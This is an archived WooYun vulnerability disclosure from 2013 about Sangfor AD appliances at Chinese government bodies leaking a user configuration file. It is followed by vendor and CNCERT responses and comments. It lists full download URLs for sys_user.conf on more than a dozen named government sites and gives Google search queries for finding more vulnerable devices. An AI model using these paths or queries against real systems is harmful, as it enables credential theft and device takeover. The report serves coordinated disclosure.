当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020012

漏洞标题:多家单位深信服设备敏感文件下载(补丁不及时),可成功控制设备 (3) ---大结局

相关厂商:多家政府相关单位

漏洞作者: leaf

提交时间:2013-03-13 15:43

修复时间:2013-04-27 15:44

公开时间:2013-04-27 15:44

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-13: 细节已通知厂商并且等待厂商处理中
2013-03-13: 厂商已经确认,细节仅向厂商公开
2013-03-23: 细节向核心白帽子及相关领域专家公开
2013-04-02: 细节向普通白帽子公开
2013-04-12: 细节向实习白帽子公开
2013-04-27: 细节向公众公开

简要描述:

多家单位深信服设备敏感文件下载(补丁不及时),可成功控制设备!
另:厂商有重大漏洞通告么?

详细说明:

湖北省信访局

https://hubeixf.gov.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


湖北省政府法制信息网

https://hbzffz.gov.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


榆林市发改委

https://yldrc.gov.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


湖北省社会科学院

https://hbsky.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


石家庄文联

https://sjzwl.gov.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


湖北省人民政府参事室

https://hbcss.gov.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


河北省人口和计划生育委员会

https://pis.hebrkjsw.gov.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


石家庄全民国防教育网

https://sjzgf.gov.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


张家港宣传文明网

https://xcb.gov.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


陕西共青团

https://sxgqt.org.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


石家庄网络广播电视台

https://sjzrtv.com/tmp/updateme/sinfor/ad/sys/sys_user.conf


太原市国土资源局

https://tylr.gov.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


榆林纪检监察网

https://yljjw.gov.cn/tmp/updateme/sinfor/ad/sys/sys_user.conf


...
...
...
and so on!!!

漏洞证明:

参照前面提交的两个同类问题,我就不一一截图了(发稿前本人均已一一验证过)!
简单分享下检测方法(Google语法):
1、intitle:sangfor ad
2、inurl:cgi-bin/frame_main.cgi (更精确)
另:写个小工具可能更方便,但是得消耗很多时间批量IP段...

修复方案:

补丁啊补丁,你在哪里?

版权声明:转载请注明来源 leaf@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-03-13 16:32

厂商回复:

对于已经确认存在的,13日下午下发给CNCERT各分中心,包括:陕西、江苏、山西、河北分中心。
按已知应用软件漏洞进行评分,rank 15 (这次的rank 总计40,主要给leaf同学提供的精确检测特征的)

最新状态:

2013-03-14:深信服公司(北京方面)已经作出积极响应,周一会与其详细会商处置情况。


漏洞评价:

评论

  1. 2013-03-13 15:48 | cncert国家互联网应急中心(乌云厂商)

    在leaf同学提供的辅助性信息,为该漏洞的检测提供了比较精确的一个方法。

  2. 2013-03-13 15:54 | xsleaf ( 实习白帽子 | Rank:52 漏洞数:5 | 探索无尽的网海~)

    什么情况啊?我这里也用了深信服的设备,会不会也在此列?求告知

  3. 2013-03-13 15:55 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @xsleaf 你这昵称和我这么接近...

  4. 2013-03-13 16:18 | 小鸡鸡 ( 实习白帽子 | Rank:40 漏洞数:10 )

    围观下 膜拜下!

  5. 2013-03-13 16:29 | cncert国家互联网应急中心(乌云厂商)

    厂商行动挺快,修复了不少了。

  6. 2013-03-13 16:39 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @cncert国家互联网应急中心 嗯

  7. 2013-03-13 18:35 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @xsleaf @leaf 你们是好基友么?!

  8. 2013-03-14 08:54 | xsleaf ( 实习白帽子 | Rank:52 漏洞数:5 | 探索无尽的网海~)

    @leaf 缘分啊~能不能分享一下漏洞详情?我这里也用了深信服的设备,担心有同样的问题,谢谢

  9. 2013-03-14 09:51 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    @xsleaf 直接看这里的归档就可以了/corp_detail.php?corp=%E6%B7%B1%E4%BF%A1%E6%9C%8D

  10. 2013-04-12 17:32 | xsleaf ( 实习白帽子 | Rank:52 漏洞数:5 | 探索无尽的网海~)

    @leaf 终于等到你提交的这个公开了,还好,我这里用的设备没有这毛病~

  11. 2013-04-27 16:06 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    我只能说sangfor的产品布局真……

  12. 2013-04-27 16:17 | xsleaf ( 实习白帽子 | Rank:52 漏洞数:5 | 探索无尽的网海~)

    @zzR 想想看,深信服的升级服务 是要收费的,我们单位用的那玩意4000元/年啊,如果不出漏洞的话,深信服不就缺掉一块收入了嘛~~所以嘛,经常搞出来些漏洞来提醒用户:你们该交钱啦!

  13. 2013-04-27 19:17 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @zzR @xsleaf 呵呵!